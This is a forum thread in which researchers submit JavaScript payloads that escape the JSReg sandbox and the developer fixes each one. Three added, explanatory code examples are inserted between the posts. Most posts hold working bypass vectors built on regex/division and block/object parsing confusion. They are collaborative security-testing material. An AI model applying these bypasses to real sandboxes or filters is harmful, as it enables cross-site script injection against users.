Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 02, 2011 06:13AM

@Jonas

Thanks! These are awesome bugs and fixed :D

I've disallowed namespaces because JSReg thinks it's a ternary and so allows the property as an array, not an accessor.

This bug: (function(){this['alert'](this['top'])})()

was related to your newer post, because I wasn't tracking those statements as left == true. The fix was simply to check each of these and add left = 1.

As for the typo, please suggest an alternative; this work is "owned" :) and built by slackers, so I'm happy to make it more readable. My logic was that it tracks in & instanceof, but the result was a pretty bad variable name =)

Once again, thanks Jonas, Lever_One and everyone else for breaking JSReg; you are making it much stronger!

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: JSReg sandbox challenge
Date: May 02, 2011 06:27AM

Regarding the typo, in the function rewrite on line 718 it says rewriteinInstanceofOperator instead of rewriteInInstanceofOperator (capital I), which results in an error when you, for example, do:

'x' in {x:1}

I'm finding this too much fun... Spending way too many hours on it.. ;)

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 02, 2011 07:25AM

@Jonas

Fixed :)
I know exactly what you mean :D

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: May 02, 2011 08:23AM

1.17

+{}
{}/lo='/,alert(parent.location)//'

=========

alert(this) // <-- check this on Opera


Quote
Jonas Magazinius
Opera seems to be broken..

Yeah, but should not.

----------------------
~Veritas~



Edited 2 time(s). Last edit at 05/02/2011 02:17PM by LeverOne.

Re: JSReg sandbox challenge
Date: May 02, 2011 10:24AM

@LeverOne: Opera seems to be broken..

@Gareth: Here's another one for you:

0?0:{}/alert(top)/i

Confusing an object with block and division with regexp. (There are more similar to this one, but I'm in a rush..)

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Re: JSReg sandbox challenge
Date: May 02, 2011 10:50AM

OK, I couldn't help myself.. Here's one last before my teaching starts:

switch(0){case {}/alert(top)/i:1}


Before this I didn't know that the "case-label" actually is an expression.. Quite interesting!

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 03, 2011 06:50AM

Phew fixed all those thanks!

The Opera bug wasn't really an Opera bug; I had an empty string testing a regex, which works on other browsers but not on Opera.

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: May 03, 2011 08:13AM

1.18

~
{}/alert(parent.location)/lo

+function(){1}/alert(parent.location)/lo

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 03, 2011 10:49AM

Tricky and fixed.

Do you think I'm getting closer? or is this just a windmill war?

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: May 03, 2011 11:15AM

NOBODY has been able to do it right the first time. Step by step.

1.19

A

lo:{}/'/,alert(parent.location)//'

lo:function x(){1}/'/,alert(parent.location)//'

B
0
{}/lo='/,alert(parent.location)//'

C
i=0,i++
{}/lo='/,alert(parent.location)//'

D
(function lo(){1})(1,/'/);alert(parent.location)//'

{}'lo'.replace(/'/,""),alert(parent.location)//'


1.20

var È=È/alert(parent.location)/È


============

(function test(x,
JSREG_FUNC){ alert(1)})(1,{})

============

Tip:

I am glad that in version 3.10 you refuse to use constructs such as "!= undefined", "== undefined", etc.

However, in the code there are a few:

1) funcName !== undefined

2) Static === undefined

This is potentially very dangerous, because JSREG has an "old environment" mode. At the present time the consequences are not critical: a bypass of "checkMaxFunctCalls" or code deformation.

In these cases "undefined" must be replaced by "{}.x" or similar.




Edited 7 time(s). Last edit at 05/04/2011 02:57PM by LeverOne.
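The `undefined` comparison from this tip, as an added example that is not JSReg's code and was not posted by anyone in the thread; `compareUndefinedChecks` and the sentinel object are my own names and constructed data. It puts the flagged pattern (`x === undefined`) beside `void 0` and the post's `{}.x`, with the identifier `undefined` rebound in the enclosing scope the way a pre-ES5 global assignment or a local binding rebinds it.

```javascript
'use strict';

// A sandbox-internal check written the way the post warns against (`x === undefined`)
// beside two forms that do not read the identifier `undefined` at all.
// `hostile` stands for whatever value an ES3 environment, or a local binding, has put into
// the name `undefined`; in ES5+ the global is read-only, but local shadowing still works.
function compareUndefinedChecks(hostile) {
  var undefined = hostile;                      // shadow the identifier inside this scope
  const naive = (v) => v === undefined;         // the pattern flagged in the post
  const viaVoid = (v) => v === void 0;          // `void 0` always evaluates to the real undefined
  const viaMissingProp = (v) => v === {}.x;     // the post's suggestion: a property that does not exist
  const missing = {}.nothing;                   // a genuinely absent value
  return {
    naiveOnMissing: naive(missing),             // false: the rebound name no longer detects a missing value
    naiveOnHostile: naive(hostile),             // true: the sentinel now passes as "undefined"
    voidOnMissing: viaVoid(missing),            // true
    voidOnHostile: viaVoid(hostile),            // false
    propOnMissing: viaMissingProp(missing),     // true
    propOnHostile: viaMissingProp(hostile),     // false
  };
}
```

In a modern engine the global `undefined` cannot be reassigned, so the rebinding here is a local `var`; the "old environment" mode the tip refers to is the case where the global itself is writable, and the safe forms behave identically in both.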

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 05, 2011 01:38PM

@LeverOne

Big thanks! And fixed those
I've also added a list of tests based on previous vectors (I didn't use to have much data, but now I do!!! :) )

I've removed the crappy preText check with regexes and instead use the states of each match to decide if it's a block statement etc. I expect some bugs here because I changed a lot of code :( but I've tested all the previous vectors and it seems to work ok. Then again, it could create syntax errors; I'll add some JS tests too soon, which will help eliminate syntax bugs.

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: May 05, 2011 03:52PM

The key moment, which determines the difference between a block's delimiter and an object literal, can be "moved up" as far as possible.

var lo=0?
lo:{}/alert(parent.location)/0


~{
lo1:{lo2:1}/alert(parent.location)/1
}


{lo1:
{lo2:1}/'/,alert(parent.location)//'
}


(
{lo:1}/alert(parent.location)/1
)


[
{lo:1}/alert(parent.location)/1
]



Nevertheless, a little better!

===============================

Quote

(chr === '+' || chr === '-' || chr === '+')




Edited 5 time(s). Last edit at 05/06/2011 06:48AM by LeverOne.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 06, 2011 06:52AM

Cool fixed those and added the vectors to the hack test

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: May 08, 2011 12:43PM

Quote

{lo1:
{lo2:1}/'/,alert(parent.location)//'
}
Quote

[
{lo:1}/alert(parent.location)/1
]

1?
{}/alert(parent.location)/i:0

0?0?
lo:lo:{}/alert(parent.location)/1

0
{
/'lo/,alert(parent.location)//'
}


Bugs:

~/lo/

a\u006Cert(1) vs a\u006cert(1)

alert((0||alert)instanceof.2.constructor)


Quote
Gareth Heyes
I need to think about that one
I agree, this remains a rather large hole. I'll stop checking for a while.




Edited 2 time(s). Last edit at 05/09/2011 10:55AM by LeverOne.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 09, 2011 06:50AM

Thanks! Fixed those.

I'm not happy with how I detect block statements though; I need to think about that one. I expect it will be pwnd again :(

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 09, 2011 11:09AM

Pwnd myself, sigh

(function(){
if(0)
return
{}/'abc/;var x=alert(location);//'
})()

Update...
and fixed. I'm gonna rewrite some code and make it a little more defensive




Edited 1 time(s). Last edit at 05/10/2011 07:15AM by Gareth Heyes.

Re: JSReg sandbox challenge
Date: May 13, 2011 12:46PM

Found two new bypasses based on the in operator:

0 in /'/,alert(top)//

for(0 in /'/,alert(top)/i);

I think the problem might be left=1; but I don't know the source well enough.

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 13, 2011 01:29PM

Yeah, I made left = 1 for in operators, which is wrong =), and I didn't add the laststate check for in operators in the regex check. Fixed, and big thanks again!

Re: JSReg sandbox challenge
Date: May 15, 2011 03:35PM

There are a number of issues with the parsing and rewriting of for-in loops.

First, the "forin" regex does not properly parse for-in loops:

for(x in [])[] // Incorrect parse
for(x in ([]))[] // Correct parse
for(x in void 0)[] // Incorrect parse
for(x in (void 0))[] // Correct parse
for([] in x)[] // Incorrect parse
for(([]) in x)[] // Incorrect parse
for({} in x)[] // Incorrect parse
for(x in x)[] // Correct parse



Second, the rewriting of for-in loops without a block breaks the loop structure:

for(x in x)[] // rewrites to:

for($x$ in $x$)
if(!/^[$].+[$]$/.test($x$)){continue;};
$x$=$x$.replace(/^\$|\$$/g,'');
[]


Thirdly, the regex to check that property names begin and end with $ does not take numbers into account:

for(x in ([1,2])){alert(x)} // Should alert 0 and 1 but doesn't

Suggested fix:
if(!/^[$].+[$]$|^\d+$/.test($x$)){continue;};


Lastly, some bypasses based on the first problem:

for(x in void 0)/'/;alert(top)//
for(x in [].x)/'/;alert(top)//
for(x in [][0])/'/;alert(top)//
for([] in ([].x))/'/;alert(top)//
if(0 in[])/'/;alert(top)//
if([]in[])/'/;alert(top)//
while([]in[])/'/;alert(top)//
for(;[]in[];)/'/;alert(top)//



One interesting side-note; if the right-hand side of the for-in is undefined, the left hand side is never evaluated.

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)



Edited 1 time(s). Last edit at 05/15/2011 04:24PM by Jonas Magazinius.
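The rewrite and the regex fix from this post, as an added example that is not JSReg's code and was not posted by anyone in the thread. `rewriteForIn`, `keysSeen` and the sample inputs are my own names and constructed data; the two key patterns are the ones quoted above. The rewritten loop always gets a block body, and `blockBody: false` reproduces the broken shape quoted above so its consequence can be observed: the guard becomes the whole loop body, and the strip-and-body part runs once after the loop, on the last enumerated key, whether the sandbox created it or not.

```javascript
'use strict';

// Key filter from the rewrite quoted in the post, and the suggested fix: array indices
// are plain digits, not $-wrapped names, and must also pass.
const KEY_PATTERN_ORIGINAL = /^[$].+[$]$/;
const KEY_PATTERN_FIXED = /^[$].+[$]$|^\d+$/;

// Emit the rewritten for-in. `loopVar` and `objExpr` are already in the sandbox's
// $-wrapped namespace; `body` is the user's loop body after rewriting.
function rewriteForIn(loopVar, objExpr, body, { pattern = KEY_PATTERN_FIXED, blockBody = true } = {}) {
  const guarded = [
    `if(!${pattern}.test(${loopVar})){continue;}`,          // skip keys the sandbox did not create
    `${loopVar}=${loopVar}.replace(/^\\$|\\$$/g,'');`,      // unwrap "$name$" -> "name" for the user's code
    body,
  ].join('\n');
  return blockBody
    ? `var ${loopVar};for(${loopVar} in ${objExpr}){\n${guarded}\n}`
    : `var ${loopVar};for(${loopVar} in ${objExpr})\n${guarded}`; // the broken shape: only the guard is inside the loop
}

// Run a rewritten loop over `obj` and return the keys the user's body observed.
// The body here is the sandbox-side form of `for (k in o) seen.push(k)`.
function keysSeen(obj, opts) {
  const src = rewriteForIn('$k$', '$o$', '$seen$.push($k$);', opts) + '\nreturn $seen$;';
  return new Function('$o$', '$seen$', src)(obj, []);
}

// Constructed sample inputs: an object the sandbox built ($-wrapped keys) that also
// carries a property the sandbox did not create, and a plain array.
const sandboxObject = { $name$: 'n', $size$: 3, rawHost: 'not sandbox-created' };
const sandboxArray = [10, 20];
```

With the fixed pattern `keysSeen(sandboxArray)` yields the indices `['0', '1']`; with the original pattern it yields nothing, which is the missed alert in `for(x in ([1,2])){alert(x)}`. The unblocked form on `sandboxObject` yields only `['rawHost']`: the body runs once, after the loop, on a key the guard was supposed to hide.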

Re: JSReg sandbox challenge
Date: May 15, 2011 04:36PM

BTW, if you want to make it defensive: one thing I look for when testing is situations where [] is incorrectly parsed as an index instead of an array and rewritten to [JSREG_FUNC.gp()]

This should never happen, since the index should always have an expression in it, i.e. [][] gives a syntax error.

When I find this I know that / will be incorrectly parsed as division instead of regex.

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)
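Added example, not JSReg's code and not posted by anyone in this thread: a small ES5-era lexer (no arrow functions or template literals) that decides, for every `/` in a source string, whether it starts a regex literal or is the division operator. The object-literal-versus-block and division-versus-regex confusion that runs through this thread, and Jonas's note just above about `[]` being parsed as an index, all come down to the same decision, so the lexer keeps a context stack for brackets: a `}` that closes a block is followed by a regex, a `}` that closes an object literal or function expression is followed by division, a `)` that closes an `if`/`while`/`for`/`with` head is followed by a regex, and `return` followed by a newline starts a new statement. It also records Jonas's invariant, an empty index `[]`, as a warning. `classifySlashes`, `slashKinds` and the context names are my own; the inputs in the test are the vectors from this thread.

```javascript
'use strict';
// Keywords that never end an operand: a "/" right after one of them starts a regex.
const KEYWORDS_NOT_OPERANDS = new Set(['return', 'typeof', 'instanceof', 'in', 'of', 'new', 'delete', 'void',
  'throw', 'case', 'do', 'else', 'yield', 'await', 'break', 'continue', 'var', 'let', 'const', 'function']);
const BLOCK_HEAD = new Set(['if', 'while', 'for', 'with', 'switch', 'catch']); // "(" after these opens a statement head
const BLOCK_KEYWORD = new Set(['else', 'do', 'try', 'finally']);               // "{" after these opens a block
const RESTRICTED = new Set(['return', 'break', 'continue']);                   // a newline after these ends the statement (ASI)
const PUNCT = /^(?:>>>=|===|!==|\*\*=|<<=|>>=|>>>|\.\.\.|&&|\|\||\?\?|\+\+|--|=>|[-+*%&|^<>=!]=|<<|>>|[-+*%&|^<>=!~?:;,.(){}\[\]])/;
const NUMBER = /^(?:0[xX][0-9a-fA-F]+|\d*\.?\d+(?:[eE][+-]?\d+)?)/;

// Returns { slashes: [{ index, kind: 'regex' | 'div' }], warnings: [string] } for an ES5 source string.
// Bracket contexts kept on `stack`: block, object, fndecl, fnexpr, head, paren, params, index, array.
function classifySlashes(src) {
  const slashes = [], warnings = [], stack = [], n = src.length;
  let prev = null, fnPending = null, ternaryDepth = 0, newlineBefore = false, i = 0;

  // Does the previous token end an operand (so a following "/" is division)?
  const prevEndsOperand = () => {
    if (!prev) return false;
    if (prev.type === 'ident') return !prev.bare && !KEYWORDS_NOT_OPERANDS.has(prev.value) && !BLOCK_HEAD.has(prev.value) && !BLOCK_KEYWORD.has(prev.value);
    if (prev.type !== 'punct') return true;                    // number, string or regex literal
    if (prev.value === ')') return prev.ctx === 'paren';       // not an if/while/for/with head, not a parameter list
    if (prev.value === ']') return true;
    if (prev.value === '}') return prev.ctx === 'object' || prev.ctx === 'fnexpr';
    if (prev.value === '++' || prev.value === '--') return prev.postfix;
    return false;
  };
  // Are we at the start of a statement (so a following "{" is a block)?
  const atStatementStart = () => {
    if (!prev) return true;
    if (prev.type === 'ident') return prev.bare || BLOCK_KEYWORD.has(prev.value) || (newlineBefore && RESTRICTED.has(prev.value));
    if (prev.type !== 'punct') return false;
    if (prev.value === ';') return true;
    if (prev.value === ':') return prev.boundary;              // label or case colon
    if (prev.value === '{') return prev.ctx !== 'object';
    if (prev.value === '}') return prev.ctx === 'block' || prev.ctx === 'fndecl';
    if (prev.value === ')') return prev.ctx === 'head';
    return false;
  };

  while (i < n) {
    const c = src[i];
    if (c === '\n') { newlineBefore = true; i++; continue; }
    if (/\s/.test(c)) { i++; continue; }
    if (c === '/' && src[i + 1] === '/') { const e = src.indexOf('\n', i); i = e < 0 ? n : e; continue; }
    if (c === '/' && src[i + 1] === '*') { const e = src.indexOf('*/', i + 2); i = e < 0 ? n : e + 2; continue; }
    let tok, m;
    if (c === '"' || c === "'") {                              // string literal
      let j = i + 1;
      while (j < n && src[j] !== c) j += src[j] === '\\' ? 2 : 1;
      tok = { type: 'string' }; i = j + 1;
    } else if ((m = NUMBER.exec(src.slice(i)))) {
      tok = { type: 'number' }; i += m[0].length;
    } else if (c === '/') {
      const kind = prevEndsOperand() ? 'div' : 'regex';
      slashes.push({ index: i, kind });
      if (kind === 'div') { tok = { type: 'punct', value: '/' }; i += src[i + 1] === '=' ? 2 : 1; }
      else {                                                   // skip the regex body (a class may contain "/") and its flags
        let j = i + 1, inClass = false;
        while (j < n && src[j] !== '\n' && (src[j] !== '/' || inClass)) {
          if (src[j] === '\\') j++; else if (src[j] === '[') inClass = true; else if (src[j] === ']') inClass = false;
          j++;
        }
        j++; while (j < n && /[a-z]/i.test(src[j])) j++;
        tok = { type: 'regex' }; i = j;
      }
    } else if (/[\p{L}_$\\]/u.test(c)) {                       // identifier or keyword (\uXXXX escapes stay in the word)
      let j = i + 1;
      while (j < n && /[\p{L}\p{N}_$\\]/u.test(src[j])) j++;
      const value = src.slice(i, j);
      // A name right after break/continue/var/let/const is a label or a binding, never an operand.
      tok = { type: 'ident', value, bare: !!prev && prev.type === 'ident' && ['break', 'continue', 'var', 'let', 'const'].includes(prev.value) };
      if (value === 'function') fnPending = atStatementStart() ? 'decl' : 'expr';
      i = j;
    } else {
      m = PUNCT.exec(src.slice(i));
      const value = m ? m[0] : c;
      tok = { type: 'punct', value };
      if (value === '(') { tok.ctx = fnPending ? 'params' : prev && prev.type === 'ident' && BLOCK_HEAD.has(prev.value) ? 'head' : 'paren'; stack.push(tok.ctx); }
      else if (value === '[') { tok.ctx = prevEndsOperand() ? 'index' : 'array'; stack.push(tok.ctx); }
      else if (value === '{') {
        if (fnPending) { tok.ctx = fnPending === 'decl' ? 'fndecl' : 'fnexpr'; fnPending = null; }
        else tok.ctx = atStatementStart() || prevEndsOperand() ? 'block' : 'object'; // "{" can never continue an operand, so ASI starts a statement
        stack.push(tok.ctx);
      } else if (value === ')' || value === ']' || value === '}') {
        tok.ctx = stack.pop() || 'unbalanced';
        if (tok.ctx === 'index' && prev && prev.value === '[') warnings.push('empty index "[]" ending at offset ' + i); // an index always holds an expression
      } else if (value === '?') ternaryDepth++;
      else if (value === ':') {
        if (stack[stack.length - 1] === 'object') tok.boundary = false;      // property value follows
        else if (ternaryDepth > 0) { ternaryDepth--; tok.boundary = false; } // ternary alternative follows
        else tok.boundary = true;                                            // label or case colon: a statement follows
      } else if (value === '++' || value === '--') tok.postfix = prevEndsOperand() && !newlineBefore;
      i += value.length;
    }
    prev = tok; newlineBefore = false;
  }
  return { slashes, warnings };
}

// Convenience: just the kinds in source order, e.g. ['regex'] or ['div', 'div'].
const slashKinds = (src) => classifySlashes(src).slashes.map((s) => s.kind);
```

The point of the stack is that the previous token alone is never enough: `{}/x/` is a regex at statement start and a division after `?:`, `+`, `~`, `in` or `instanceof`, and `)` means division only when it closes a plain parenthesised expression. The lexer covers the thread's vectors but not everything a browser does: HTML-like `<!--` comments, the Firefox-only conditional `catch`, and anything newer than ES5 are out of scope, and a sandbox that relies on lexing alone still needs the behavioural tests this thread keeps adding.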

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 16, 2011 09:59AM

Jonas, you're awesome! I knew this would be the next thing you'd exploit =) I will rewrite the loops section, as it's pretty weak, as you've demonstrated. I'll also improve each match to use one check instead of two for performance. Pretty busy atm, but expect an update soon, probably when the missus is watching something crap on TV :D

Re: JSReg sandbox challenge
Date: May 17, 2011 12:00PM

Turns out the problem runs a bit deeper than I thought:

while(0)/'/;alert(top)//
if(0)/'/;alert(top)//
for(;0;)/'/;alert(top)//
with(0)/'/;alert(top)//

Not sure if these are a separate issue or not.

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Re: JSReg sandbox challenge
Date: May 17, 2011 01:53PM

A new kind of problem:

0/function(){}/alert(top)//

Also, this causes endless loop:

0/function(){}/

Found while trying to exploit this:

function()[]

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: May 17, 2011 02:10PM

1
~/'lo/+alert(parent.location)//'


true
{}/'lo/+alert(parent.location)//'


1?
function lo(){1}/alert(parent.location)/1:1


var i=1
i+++
{lo:1}/alert(parent.location)/1


added later:

[
function(lo){}/alert(parent.location)/1
]


Bugs:

~function(){/re/}

~{x:/re/}

(0||alert)instanceof.2.constructor --> should return "false" (missed Number.prototype.$constructor$ and Math.prototype.$constructor$)




Edited 1 time(s). Last edit at 05/18/2011 08:55AM by LeverOne.

Re: JSReg sandbox challenge
Date: May 17, 2011 02:18PM

Sorry, but here's another one..

(function(){}['constructor'])('alert(top)')()

(function(){}/alert(top)/1)

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)



Edited 1 time(s). Last edit at 05/17/2011 02:37PM by Jonas Magazinius.

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: May 17, 2011 02:28PM

@Jonas Magazinius,

The previous one was a great bypass!

--------- Non-IE browsers

1</**/!--i+
{}/'lo/,alert(parent.location)//'


1<//
!--i+
{}/'lo/,alert(parent.location)//'




Edited 2 time(s). Last edit at 05/18/2011 08:49AM by LeverOne.

Re: JSReg sandbox challenge
Date: May 17, 2011 03:13PM

@LeverOne: Thanks, I admire your work :)

And two more..

[]instanceof{}/alert(top)//
[]in{}/alert(top)//

----------------34----------------
_=/.+?('['_='+_(_)]+).+/,'_='+_(_)

Re: JSReg sandbox challenge
Posted by: LeverOne
Date: May 17, 2011 06:11PM

Non-FF browsers:

var n
/'lo/+alert(parent.location)//'


===================

Additional testcases for statements "break" and "continue":

All browsers:

for (i=0;i<1;i++){
if(0) continue
{}/'lo/+alert(parent.location)//'
}


for (i=0;i<1;i++){
if(0) break
{}/'lo/+alert(parent.location)//'
}


Non-FF browsers:

x:for (i=0;i<1;i++){
if(0) continue x
/'lo/+alert(parent.location)//'
}


x:for (i=0;i<1;i++){
if(0) break x
/'lo/+alert(parent.location)//'
}

=================================

if(0)0
else {}/'lo/,alert(parent.location)//'


try{}
catch(e){}
finally{}/'lo/,alert(parent.location)//'


bug:

if(0)0
else/x/


Another syntactic heterogeneity: a ";" followed by a declaration block isn't necessary.

for(;
{}/alert(parent.location)/1
;lo)0

==============================

I would also like to warn you, @Gareth, about a syntactic bomb based on this:
Quote
Jonas Magazinius
if(0)/'/;alert(top)//

Actually, here is the bomb:

// FF

try{x}
catch(lo if(1)/alert(parent.location)/1){}




Edited 7 time(s). Last edit at 06/26/2011 01:48PM by LeverOne.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: May 18, 2011 06:40AM

@LeverOne @Jonas

I too admire both your work :)

I seem to have a bloody nose again :D great stuff! Thanks, I'll let you know soon when I have a fix. Statements defo need a rewrite.

Re: JSReg sandbox challenge
Posted by: Gareth Heyes
Date: July 14, 2011 03:01PM

I don't know how to thank you guys, as you've helped me so much, so I've dedicated a blog post to you both and uploaded a new version of JSReg:

[www.thespanner.co.uk]

If I was a millionaire I'd give you cold hard cash :D




Edited 2 time(s). Last edit at 07/14/2011 06:32PM by Gareth Heyes.
